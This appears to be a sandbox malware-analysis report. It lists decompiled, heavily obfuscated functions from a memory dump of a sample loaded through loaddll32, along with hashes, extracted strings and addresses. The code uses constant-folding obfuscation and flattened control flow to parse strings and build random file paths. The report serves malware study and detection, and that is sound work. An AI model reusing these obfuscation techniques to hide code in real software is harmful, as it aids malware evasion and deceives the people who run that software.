Uniqueness Score: -1.00%

Function 02B37E79, Relevance: 2.6, Strings: 2, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E02B37E79(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v304;
				char _t99;
				signed int _t101;
				void* _t105;
				signed int _t107;
				signed int _t108;
				char* _t109;
				intOrPtr* _t124;
				void* _t125;

				_t124 = __ecx;
				_v16 = 0xb54463;
				_v16 = _v16 + 0xffff3415;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 + 0xffffe11b;
				_v16 = _v16 ^ 0xfff7a701;
				_v28 = 0xd77279;
				_v28 = _v28 | 0x400730c3;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0xbb990da4;
				_v36 = 0xbcfff8;
				_v36 = _v36 >> 6;
				_v36 = _v36 ^ 0x000a6762;
				_v8 = 0xf31a9;
				_v8 = _v8 + 0xffff1e98;
				_v8 = _v8 ^ 0xb4a41066;
				_v8 = _v8 | 0xf0d45968;
				_v8 = _v8 ^ 0xf4f540ba;
				_v12 = 0xc524e1;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 >> 5;
				_t107 = 0x45;
				_v12 = _v12 / _t107;
				_v12 = _v12 ^ 0x00048931;
				_v44 = 0x28a4d;
				_v44 = _v44 + 0x8441;
				_v44 = _v44 ^ 0x00037729;
				_v20 = 0x237a7e;
				_v20 = _v20 ^ 0x3c41f8ff;
				_v20 = _v20 | 0x4ede09cf;
				_v20 = _v20 >> 6;
				_v20 = _v20 ^ 0x01f9a400;
				_v32 = 0xc1354c;
				_v32 = _v32 ^ 0xd017d736;
				_v32 = _v32 + 0xb685;
				_v32 = _v32 ^ 0xd0d9caff;
				_v24 = 0x1c6e66;
				_v24 = _v24 + 0xffff7553;
				_t108 = 0x67;
				_t109 =  &_v304;
				_v24 = _v24 / _t108;
				_v24 = _v24 ^ 0x000aa416;
				_v40 = 0xe04b7f;
				_v40 = _v40 ^ 0x3f01302b;
				_v40 = _v40 ^ 0x3feda652;
				while(1) {
					_t99 =  *_t124;
					if(_t99 == 0) {
						break;
					}
					if(_t99 == 0x2e) {
						 *_t109 = 0;
					} else {
						 *_t109 = _t99;
						_t109 = _t109 + 1;
						_t124 = _t124 + 1;
						continue;
					}
					L6:
					_t125 = E02B3801A(_v16,  &_v304, _v28);
					if(_t125 != 0) {
						L8:
						_t101 = E02B33362(_t124 + 1, _v12, _v44);
						_push(_v40);
						_push(_v24);
						_push(_t101 ^ 0x31e3fec1);
						_push(_t125);
						return E02B3EC31(_v20, _v32);
					}
					_t105 = E02B3483C(_v36, _v8,  &_v304);
					_t125 = _t105;
					if(_t125 != 0) {
						goto L8;
					}
					return _t105;
				}
				goto L6;
			}

0x02b37e84
0x02b37e86
0x02b37e8f
0x02b37e96
0x02b37e9a
0x02b37ea1
0x02b37ea8
0x02b37eaf
0x02b37eb6
0x02b37eba
0x02b37ec1
0x02b37ec8
0x02b37ecc
0x02b37ed3
0x02b37eda
0x02b37ee1
0x02b37ee8
0x02b37eef
0x02b37ef6
0x02b37efd
0x02b37f01
0x02b37f0a
0x02b37f0f
0x02b37f14
0x02b37f1b
0x02b37f22
0x02b37f29
0x02b37f30
0x02b37f37
0x02b37f3e
0x02b37f45
0x02b37f49
0x02b37f50
0x02b37f57
0x02b37f5e
0x02b37f65
0x02b37f6c
0x02b37f73
0x02b37f7d
0x02b37f80
0x02b37f86
0x02b37f89
0x02b37f90
0x02b37f97
0x02b37f9e
0x02b37faf
0x02b37faf
0x02b37fb3
0x00000000
0x00000000
0x02b37fa9
0x02b37fb7
0x02b37fab
0x02b37fab
0x02b37fad
0x02b37fae
0x00000000
0x02b37fae
0x02b37fba
0x02b37fcb
0x02b37fd0
0x02b37feb
0x02b37ff4
0x02b37ff9
0x02b38001
0x02b3800a
0x02b3800b
0x00000000
0x02b38011
0x02b37fdf
0x02b37fe4
0x02b37fe9
0x00000000
0x00000000
0x02b38019
0x02b38019
0x00000000

Strings

bg, xrefs: 02B37ECC
~z#, xrefs: 02B37F30

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: bg$~z#
API String ID: 0-3633068236
Opcode ID: d27443a6954f6df962cc2ff153474a91a954d70af200d7c111dd209c5580846d
Instruction ID: b2eec1053e542325409204b7aa5e1afb0bf8c5a15c083f05fa1575b930d3f99e
Opcode Fuzzy Hash: d27443a6954f6df962cc2ff153474a91a954d70af200d7c111dd209c5580846d
Instruction Fuzzy Hash: 6B413276C0121EDBDF5ACEA4C8495EEFBB1BF55318F208199D451B6220C7B80A4ACFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B45515, Relevance: 2.6, Strings: 2, Instructions: 92COMMON

Download Yara Rule

Strings

(8r, xrefs: 02B45578
bWr, xrefs: 02B4551E

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: bWr$(8r
API String ID: 0-4034592896
Opcode ID: 6bd561600b29e8d40b53efd76a24b6e4d1b51c40b914b8d5291e690eb23a4ca9
Instruction ID: a4d42b6a717b96526c0bede67d417724ea80f4ca2bacae19c31b6f740b4768cc
Opcode Fuzzy Hash: 6bd561600b29e8d40b53efd76a24b6e4d1b51c40b914b8d5291e690eb23a4ca9
Instruction Fuzzy Hash: 88413471C00219EFCF18DFA4C98A9EEBBB5FB04304F10818AD511B6260D7B55B85DF95

Uniqueness

Uniqueness Score: -1.00%

Function 02B4F840, Relevance: 1.5, Strings: 1, Instructions: 210
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E02B4F840(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* _t197;
				void* _t220;
				intOrPtr* _t230;
				void* _t232;
				void* _t252;
				void* _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int* _t264;

				_t230 = _a4;
				_push(_a8);
				_t252 = __ecx;
				_push(_t230);
				_push(__ecx);
				E02B4FE29(_t197);
				_v16 = 0x43fd88;
				_t264 =  &(( &_v84)[4]);
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x043fd881;
				_t253 = 0;
				_v36 = 0xa6c090;
				_t232 = 0x483ab52;
				_v36 = _v36 >> 0xd;
				_v36 = _v36 + 0x55d4;
				_v36 = _v36 ^ 0x00005b0b;
				_v48 = 0x2dc4d8;
				_t254 = 0xf;
				_v48 = _v48 / _t254;
				_v48 = _v48 + 0x1bd9;
				_v48 = _v48 ^ 0x0001e475;
				_v80 = 0x1961e0;
				_v80 = _v80 | 0x2e5a3b97;
				_v80 = _v80 >> 0x10;
				_v80 = _v80 >> 4;
				_v80 = _v80 ^ 0x00050c56;
				_v52 = 0x801119;
				_t255 = 0x4c;
				_v52 = _v52 * 0x3b;
				_v52 = _v52 / _t255;
				_v52 = _v52 ^ 0x006b0701;
				_v12 = 0x5b3baf;
				_v12 = _v12 + 0xffffe0d8;
				_v12 = _v12 ^ 0x0050d6d6;
				_v20 = 0xddf3bb;
				_v20 = _v20 + 0x1688;
				_v20 = _v20 ^ 0x00da105f;
				_v84 = 0xb842b2;
				_v84 = _v84 >> 3;
				_t256 = 0x6e;
				_v84 = _v84 * 0x79;
				_v84 = _v84 << 3;
				_v84 = _v84 ^ 0x571ab13d;
				_v56 = 0xc043e1;
				_v56 = _v56 >> 6;
				_v56 = _v56 ^ 0x181f9cd5;
				_v56 = _v56 ^ 0x181bbe52;
				_v24 = 0xd2b7cf;
				_v24 = _v24 / _t256;
				_v24 = _v24 ^ 0x00057f60;
				_v60 = 0x8a3800;
				_v60 = _v60 >> 6;
				_v60 = _v60 | 0x8f8b2365;
				_v60 = _v60 ^ 0x8f8e0970;
				_v64 = 0xc9e96d;
				_v64 = _v64 << 0x10;
				_v64 = _v64 << 5;
				_v64 = _v64 ^ 0x2da69c1f;
				_v68 = 0x328e52;
				_v68 = _v68 * 0x66;
				_v68 = _v68 << 3;
				_v68 = _v68 ^ 0xa1266097;
				_v28 = 0xf9277c;
				_v28 = _v28 << 0xa;
				_v28 = _v28 << 3;
				_v28 = _v28 ^ 0x24e98be4;
				_v72 = 0xc9ae08;
				_v72 = _v72 | 0xbe9fb7a8;
				_v72 = _v72 << 1;
				_v72 = _v72 + 0xffff17b5;
				_v72 = _v72 ^ 0x7db3cb0d;
				_v32 = 0x7a6981;
				_v32 = _v32 ^ 0xd4fdb142;
				_t257 = 0x69;
				_v32 = _v32 / _t257;
				_v32 = _v32 ^ 0x020955a0;
				_v76 = 0x732b21;
				_t258 = 0x5e;
				_v76 = _v76 / _t258;
				_t259 = 0xb;
				_v76 = _v76 / _t259;
				_v76 = _v76 + 0xb8c3;
				_v76 = _v76 ^ 0x0005bc70;
				_v8 = 0x8f6a69;
				_t260 = 0x5d;
				_v8 = _v8 / _t260;
				_v8 = _v8 ^ 0x000b5b39;
				_v40 = 0x75e3f0;
				_t261 = 0x55;
				_v40 = _v40 / _t261;
				_v40 = _v40 + 0xffff98ec;
				_v40 = _v40 ^ 0x0009f0a2;
				_v44 = 0x50946;
				_v44 = _v44 * 0x76;
				_v44 = _v44 + 0xffff2591;
				_v44 = _v44 ^ 0x0253dc14;
				do {
					while(_t232 != 0x483ab52) {
						if(_t232 == 0x71a4461) {
							_t220 = E02B4A1C0(_v48, _t232, _v80, _v52, _v12,  &_v4, _v16, _v20, _v84, 0, _t232, _v56, _t252);
							_t264 =  &(_t264[0xc]);
							if(_t220 != 0) {
								_t232 = 0xc565723;
								continue;
							}
						} else {
							if(_t232 == 0xc565723) {
								_push(_t232);
								_push(_t232);
								_t253 = E02B3C5D8(_v4);
								_t264 =  &(_t264[3]);
								if(_t253 != 0) {
									_t232 = 0xf0f9d9d;
									continue;
								}
							} else {
								if(_t232 != 0xf0f9d9d) {
									goto L12;
								} else {
									E02B4A1C0(_v28, _t232, _v72, _v32, _v76,  &_v4, _v36, _v8, _v40, _t253, _t232, _v44, _t252);
									 *_t230 = _v4;
								}
							}
						}
						L6:
						return _t253;
					}
					_t232 = 0x71a4461;
					L12:
				} while (_t232 != 0xd0fff7e);
				goto L6;
			}

0x02b4f844
0x02b4f84b
0x02b4f84f
0x02b4f851
0x02b4f853
0x02b4f854
0x02b4f859
0x02b4f861
0x02b4f864
0x02b4f86b
0x02b4f873
0x02b4f875
0x02b4f87d
0x02b4f882
0x02b4f887
0x02b4f88f
0x02b4f897
0x02b4f8a5
0x02b4f8aa
0x02b4f8b0
0x02b4f8b8
0x02b4f8c0
0x02b4f8c8
0x02b4f8d0
0x02b4f8d5
0x02b4f8da
0x02b4f8e2
0x02b4f8ef
0x02b4f8f2
0x02b4f8fe
0x02b4f902
0x02b4f90a
0x02b4f912
0x02b4f91a
0x02b4f922
0x02b4f92a
0x02b4f932
0x02b4f93a
0x02b4f942
0x02b4f94c
0x02b4f94d
0x02b4f951
0x02b4f956
0x02b4f95e
0x02b4f966
0x02b4f96b
0x02b4f973
0x02b4f97b
0x02b4f989
0x02b4f98d
0x02b4f995
0x02b4f99d
0x02b4f9a2
0x02b4f9aa
0x02b4f9b2
0x02b4f9ba
0x02b4f9bf
0x02b4f9c4
0x02b4f9cc
0x02b4f9d9
0x02b4f9dd
0x02b4f9e2
0x02b4f9ec
0x02b4f9f4
0x02b4f9f9
0x02b4f9fe
0x02b4fa06
0x02b4fa0e
0x02b4fa16
0x02b4fa1a
0x02b4fa22
0x02b4fa2a
0x02b4fa32
0x02b4fa40
0x02b4fa45
0x02b4fa4b
0x02b4fa53
0x02b4fa5f
0x02b4fa64
0x02b4fa6e
0x02b4fa73
0x02b4fa79
0x02b4fa81
0x02b4fa89
0x02b4fa95
0x02b4fa9a
0x02b4faa0
0x02b4faa8
0x02b4fab4
0x02b4fabc
0x02b4fac0
0x02b4fac8
0x02b4fad0
0x02b4fadd
0x02b4fae1
0x02b4fae9
0x02b4faf1
0x02b4faf1
0x02b4faff
0x02b4fbb5
0x02b4fbba
0x02b4fbbf
0x02b4fbc1
0x00000000
0x02b4fbc1
0x02b4fb05
0x02b4fb0b
0x02b4fb6d
0x02b4fb6e
0x02b4fb78
0x02b4fb7a
0x02b4fb7f
0x02b4fb81
0x00000000
0x02b4fb81
0x02b4fb0d
0x02b4fb13
0x00000000
0x02b4fb19
0x02b4fb42
0x02b4fb51
0x02b4fb51
0x02b4fb13
0x02b4fb0b
0x02b4fb54
0x02b4fb5c
0x02b4fb5c
0x02b4fbcb
0x02b4fbcd
0x02b4fbcd
0x00000000

Strings

!+s, xrefs: 02B4FA53

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: !+s
API String ID: 0-2041718826
Opcode ID: ecbfb722ef4a51468ccc6504c580edf44e6ea5507055d07fe96aabdae32b1462
Instruction ID: 25b656dfd6a3fba08f44c0299b8999e643ff72b0d678a1f28708170710ea4319
Opcode Fuzzy Hash: ecbfb722ef4a51468ccc6504c580edf44e6ea5507055d07fe96aabdae32b1462
Instruction Fuzzy Hash: 079100720083449FD758CF66C88991BFBE1FBC5B58F40892DF69686260D7B6C949CF82

Uniqueness

Uniqueness Score: -1.00%

Function 02B50A64, Relevance: 1.4, Strings: 1, Instructions: 197
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E02B50A64(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t180;
				void* _t211;
				void* _t212;
				void* _t214;
				void* _t238;
				void* _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int* _t250;

				_push(_a8);
				_t238 = __edx;
				_t212 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t180);
				_v56 = 0xc0d7de;
				_t250 =  &(( &_v76)[4]);
				_v56 = _v56 << 2;
				_v56 = _v56 << 7;
				_t239 = 0;
				_v56 = _v56 ^ 0x81afbc01;
				_t214 = 0xaac46ca;
				_v64 = 0x3a8e28;
				_v64 = _v64 >> 1;
				_v64 = _v64 + 0xe78e;
				_v64 = _v64 >> 0xd;
				_v64 = _v64 ^ 0x000000f0;
				_v16 = 0x168660;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x4000b433;
				_v8 = 0x28d09b;
				_t240 = 0x6c;
				_v8 = _v8 / _t240;
				_v8 = _v8 ^ 0x400060bf;
				_v72 = 0xacfd47;
				_v72 = _v72 ^ 0xaf3d897a;
				_v72 = _v72 << 2;
				_v72 = _v72 >> 1;
				_v72 = _v72 ^ 0x5f2a69ef;
				_v60 = 0xaad3e;
				_v60 = _v60 >> 7;
				_v60 = _v60 + 0x530f;
				_v60 = _v60 ^ 0x00047061;
				_v20 = 0xd1ee8e;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0x00058db8;
				_v76 = 0xa228f;
				_t241 = 0x1c;
				_v76 = _v76 / _t241;
				_t242 = 0x30;
				_v76 = _v76 * 0x79;
				_v76 = _v76 | 0xd88c69ec;
				_v76 = _v76 ^ 0xd8a0fe12;
				_v24 = 0xd67a62;
				_v24 = _v24 + 0xffff00ae;
				_v24 = _v24 ^ 0x00d8581e;
				_v40 = 0xcb2b10;
				_v40 = _v40 / _t242;
				_t243 = 0x14;
				_v40 = _v40 / _t243;
				_v40 = _v40 ^ 0x0006cc26;
				_v44 = 0xf09ad;
				_v44 = _v44 << 0xd;
				_v44 = _v44 | 0x1b12e533;
				_v44 = _v44 ^ 0xfb3e9f34;
				_v48 = 0xeb0c29;
				_v48 = _v48 * 0x7b;
				_t244 = 0x65;
				_v48 = _v48 / _t244;
				_v48 = _v48 ^ 0x0113d763;
				_v52 = 0x64962b;
				_v52 = _v52 + 0xfffff671;
				_v52 = _v52 + 0x8f00;
				_v52 = _v52 ^ 0x00671ded;
				_v28 = 0xef32a4;
				_v28 = _v28 + 0xf3f6;
				_t245 = 0x57;
				_v28 = _v28 / _t245;
				_v28 = _v28 ^ 0x000c1b67;
				_v32 = 0x4955c4;
				_v32 = _v32 << 7;
				_t246 = 0x75;
				_v32 = _v32 / _t246;
				_v32 = _v32 ^ 0x005efa9b;
				_v68 = 0x926f14;
				_v68 = _v68 ^ 0x2f6794d2;
				_t247 = 0x7f;
				_v68 = _v68 / _t247;
				_v68 = _v68 + 0xe0be;
				_v68 = _v68 ^ 0x00650f61;
				_v12 = 0xa3b92d;
				_v12 = _v12 + 0xffff94bd;
				_v12 = _v12 ^ 0x00ae9057;
				_v36 = 0x571707;
				_v36 = _v36 << 3;
				_v36 = _v36 + 0xffff7ee3;
				_v36 = _v36 ^ 0x02b89578;
				do {
					while(_t214 != 0x665f559) {
						if(_t214 == 0x8e4e5a6) {
							_push(_t214);
							_push(_t214);
							_t239 = E02B3C5D8(_v4 + _v4);
							_t250 =  &(_t250[3]);
							if(_t239 != 0) {
								_t214 = 0x665f559;
								continue;
							}
						} else {
							if(_t214 == 0xa67d5aa) {
								_t211 = E02B4C4F8(_v72, _v16 | _v56, _t212, 0, _v60, _v20, _v76, _v24,  &_v4, _t238);
								_t250 =  &(_t250[8]);
								if(_t211 != 0) {
									_t214 = 0x8e4e5a6;
									continue;
								}
							} else {
								if(_t214 != 0xaac46ca) {
									goto L11;
								} else {
									_t214 = 0xa67d5aa;
									continue;
								}
							}
						}
						goto L12;
					}
					E02B4C4F8(_v28, _v8 | _v64, _t212, _t239, _v32, _v68, _v12, _v36,  &_v4, _t238);
					_t250 =  &(_t250[8]);
					_t214 = 0xee0867e;
					L11:
				} while (_t214 != 0xee0867e);
				L12:
				return _t239;
			}

0x02b50a6b
0x02b50a6f
0x02b50a71
0x02b50a73
0x02b50a77
0x02b50a78
0x02b50a79
0x02b50a7e
0x02b50a86
0x02b50a89
0x02b50a90
0x02b50a95
0x02b50a97
0x02b50a9f
0x02b50aa4
0x02b50aac
0x02b50ab0
0x02b50ab8
0x02b50abd
0x02b50ac5
0x02b50acd
0x02b50ad2
0x02b50ada
0x02b50ae8
0x02b50aed
0x02b50af3
0x02b50afb
0x02b50b03
0x02b50b0b
0x02b50b10
0x02b50b14
0x02b50b1c
0x02b50b24
0x02b50b29
0x02b50b31
0x02b50b39
0x02b50b41
0x02b50b46
0x02b50b4e
0x02b50b5a
0x02b50b5f
0x02b50b6a
0x02b50b6d
0x02b50b71
0x02b50b79
0x02b50b81
0x02b50b89
0x02b50b91
0x02b50b99
0x02b50ba9
0x02b50bb1
0x02b50bb4
0x02b50bb8
0x02b50bc0
0x02b50bc8
0x02b50bcd
0x02b50bd5
0x02b50bdd
0x02b50bea
0x02b50bf6
0x02b50bfb
0x02b50c01
0x02b50c09
0x02b50c11
0x02b50c19
0x02b50c21
0x02b50c29
0x02b50c31
0x02b50c3d
0x02b50c42
0x02b50c48
0x02b50c50
0x02b50c58
0x02b50c61
0x02b50c66
0x02b50c6c
0x02b50c74
0x02b50c7c
0x02b50c88
0x02b50c90
0x02b50c94
0x02b50c9c
0x02b50ca4
0x02b50cac
0x02b50cb4
0x02b50cbc
0x02b50cc4
0x02b50cc9
0x02b50cd1
0x02b50cd9
0x02b50cd9
0x02b50ce7
0x02b50d50
0x02b50d51
0x02b50d5a
0x02b50d5c
0x02b50d61
0x02b50d63
0x00000000
0x02b50d63
0x02b50ce9
0x02b50cef
0x02b50d29
0x02b50d2e
0x02b50d33
0x02b50d35
0x00000000
0x02b50d35
0x02b50cf1
0x02b50cf7
0x00000000
0x02b50cfd
0x02b50cfd
0x00000000
0x02b50cfd
0x02b50cf7
0x02b50cef
0x00000000
0x02b50ce7
0x02b50d8e
0x02b50d93
0x02b50d96
0x02b50d9b
0x02b50d9b
0x02b50da8
0x02b50db0

Strings

i*_, xrefs: 02B50B14

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: i*_
API String ID: 0-4175851924
Opcode ID: 033916526ebd42fe384ae7de4cef2794808c9c5efeeb7d3c76fe8acba1a56522
Instruction ID: 275fcd5e30c66db5d68a0b6647ff2432fda98e638561c985d3413c16f9f21c3f
Opcode Fuzzy Hash: 033916526ebd42fe384ae7de4cef2794808c9c5efeeb7d3c76fe8acba1a56522
Instruction Fuzzy Hash: A58142721083409FD354CF61D989A1BFBE2EBC5B58F40891DF9929A2A0D7B6C949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 02B4C5D5, Relevance: 1.4, Strings: 1, Instructions: 194
COMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E02B4C5D5() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				short _t190;
				signed int _t195;
				void* _t198;
				void* _t217;
				intOrPtr _t220;
				void* _t221;
				short* _t222;
				void* _t223;
				short* _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				void* _t232;

				_t220 =  *0x2b56214; // 0x0
				_v28 = 0x163a95;
				_t221 = _t220 + 0x23c;
				_t198 = 0x1db3eac;
				_t225 = 0x2a;
				_v28 = _v28 * 0x43;
				_v28 = _v28 | 0x78fa3d4f;
				_v28 = _v28 + 0xb7b9;
				_v28 = _v28 ^ 0x7df609b0;
				_v36 = 0x641eba;
				_v36 = _v36 / _t225;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0x02679a20;
				_v60 = 0x1f128d;
				_v60 = _v60 | 0x723f4715;
				_v60 = _v60 ^ 0x7234fc66;
				_v8 = 0xac331e;
				_v8 = _v8 ^ 0xe591128e;
				_v8 = _v8 << 4;
				_v8 = _v8 + 0xffffc28e;
				_v8 = _v8 ^ 0x53d02dfe;
				_v32 = 0x5bb4ea;
				_v32 = _v32 ^ 0xe8579be7;
				_v32 = _v32 + 0xffff04e9;
				_v32 = _v32 ^ 0xe8074079;
				_v40 = 0xd0bea7;
				_v40 = _v40 << 1;
				_t226 = 0x1d;
				_v40 = _v40 / _t226;
				_v40 = _v40 ^ 0x000c7110;
				_v64 = 0x41c151;
				_v64 = _v64 << 1;
				_v64 = _v64 ^ 0x00828c11;
				_v44 = 0x3034cc;
				_t227 = 0x1a;
				_v44 = _v44 / _t227;
				_v44 = _v44 + 0xffffde13;
				_v44 = _v44 ^ 0x000cb2d3;
				_v12 = 0xb1859b;
				_v12 = _v12 ^ 0xe04d3b3c;
				_t228 = 0x25;
				_v12 = _v12 * 7;
				_v12 = _v12 | 0x0065acf4;
				_v12 = _v12 ^ 0x26e71960;
				_v68 = 0x4e3808;
				_v68 = _v68 | 0x4ec02654;
				_v68 = _v68 ^ 0x4ec4b15d;
				_v48 = 0x7afa7b;
				_v48 = _v48 ^ 0xc20923f7;
				_v48 = _v48 / _t228;
				_v48 = _v48 ^ 0x0544c062;
				_v20 = 0x2ff9aa;
				_v20 = _v20 + 0xffffa865;
				_v20 = _v20 * 0x24;
				_v20 = _v20 + 0x4632;
				_v20 = _v20 ^ 0x06bd6615;
				_v16 = 0x2d8807;
				_v16 = _v16 * 0x5f;
				_v16 = _v16 << 3;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0xcaf714e8;
				_v52 = 0xcb8ac1;
				_v52 = _v52 << 0xb;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 ^ 0x000dc079;
				_v24 = 0xed824f;
				_v24 = _v24 + 0x6e9c;
				_t229 = 0x19;
				_v24 = _v24 / _t229;
				_v24 = _v24 >> 0x10;
				_v24 = _v24 ^ 0x00044037;
				_v56 = 0xd4fc47;
				_v56 = _v56 << 5;
				_v56 = _v56 << 0xb;
				_v56 = _v56 ^ 0xfc4a9c10;
				_v72 = 0x35720e;
				_v72 = _v72 ^ 0x5bf10d31;
				_v72 = _v72 ^ 0x5bc050cb;
				do {
					while(_t198 != 0x1db3eac) {
						if(_t198 == 0x2b86adf) {
							E02B3E404(_v56, 1, _v72, 3, _t221);
							 *((short*)(_t221 + 6)) = 0;
							return 0;
						}
						if(_t198 == 0x6ec99df) {
							_push(_t198);
							_push(_t198);
							_t230 = E02B4CCA0(4, 0x10);
							E02B3E404(_v52, 1, _v24, _t230, _t221);
							_t232 = _t232 + 0x1c;
							_t222 = _t221 + _t230 * 2;
							_t198 = 0x2b86adf;
							_t190 = 0x2e;
							 *_t222 = _t190;
							_t221 = _t222 + 2;
							continue;
						}
						if(_t198 != 0x6f740c2) {
							goto L8;
						}
						_push(_t198);
						_push(_t198);
						_t195 = E02B4CCA0(4, 0x10);
						_push(_t221);
						_push(1);
						_push(_v64);
						_t231 = _t195;
						_t217 = 2;
						E02B3E404(_v40, _t217);
						_t223 = _t221 + 2;
						E02B3E404(_v44, 1, _v12, _t231, _t223);
						_t232 = _t232 + 0x28;
						_t224 = _t223 + _t231 * 2;
						_t198 = 0x6ec99df;
						_t190 = 0x5c;
						 *_t224 = _t190;
						_t221 = _t224 + 2;
					}
					E02B3DC1B(_t198);
					_t198 = 0x6f740c2;
					L8:
				} while (_t198 != 0x41dad81);
				return _t190;
			}

0x02b4c5dd
0x02b4c5e5
0x02b4c5ec
0x02b4c5f6
0x02b4c5fd
0x02b4c600
0x02b4c603
0x02b4c60a
0x02b4c611
0x02b4c618
0x02b4c626
0x02b4c629
0x02b4c62d
0x02b4c634
0x02b4c63b
0x02b4c642
0x02b4c649
0x02b4c650
0x02b4c657
0x02b4c65b
0x02b4c662
0x02b4c669
0x02b4c670
0x02b4c677
0x02b4c67e
0x02b4c685
0x02b4c68c
0x02b4c692
0x02b4c697
0x02b4c69c
0x02b4c6a3
0x02b4c6aa
0x02b4c6ad
0x02b4c6b4
0x02b4c6be
0x02b4c6c3
0x02b4c6c8
0x02b4c6cf
0x02b4c6d6
0x02b4c6dd
0x02b4c6e8
0x02b4c6e9
0x02b4c6ec
0x02b4c6f3
0x02b4c6fa
0x02b4c701
0x02b4c708
0x02b4c70f
0x02b4c716
0x02b4c722
0x02b4c725
0x02b4c72c
0x02b4c733
0x02b4c73e
0x02b4c741
0x02b4c748
0x02b4c74f
0x02b4c75a
0x02b4c75d
0x02b4c761
0x02b4c767
0x02b4c76e
0x02b4c775
0x02b4c779
0x02b4c77d
0x02b4c784
0x02b4c78b
0x02b4c797
0x02b4c79a
0x02b4c79d
0x02b4c7a1
0x02b4c7a8
0x02b4c7af
0x02b4c7b3
0x02b4c7b7
0x02b4c7be
0x02b4c7c5
0x02b4c7cc
0x02b4c7d3
0x02b4c7d3
0x02b4c7e5
0x02b4c8bb
0x02b4c8c5
0x00000000
0x02b4c8c5
0x02b4c7f1
0x02b4c85e
0x02b4c85f
0x02b4c869
0x02b4c876
0x02b4c87b
0x02b4c87e
0x02b4c881
0x02b4c888
0x02b4c889
0x02b4c88c
0x00000000
0x02b4c88c
0x02b4c7f9
0x00000000
0x00000000
0x02b4c80b
0x02b4c80c
0x02b4c811
0x02b4c816
0x02b4c817
0x02b4c819
0x02b4c81f
0x02b4c823
0x02b4c824
0x02b4c829
0x02b4c837
0x02b4c83c
0x02b4c83f
0x02b4c842
0x02b4c849
0x02b4c84a
0x02b4c84d
0x02b4c84d
0x02b4c897
0x02b4c89c
0x02b4c8a1
0x02b4c8a1
0x00000000

Strings

<;M, xrefs: 02B4C6DD

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

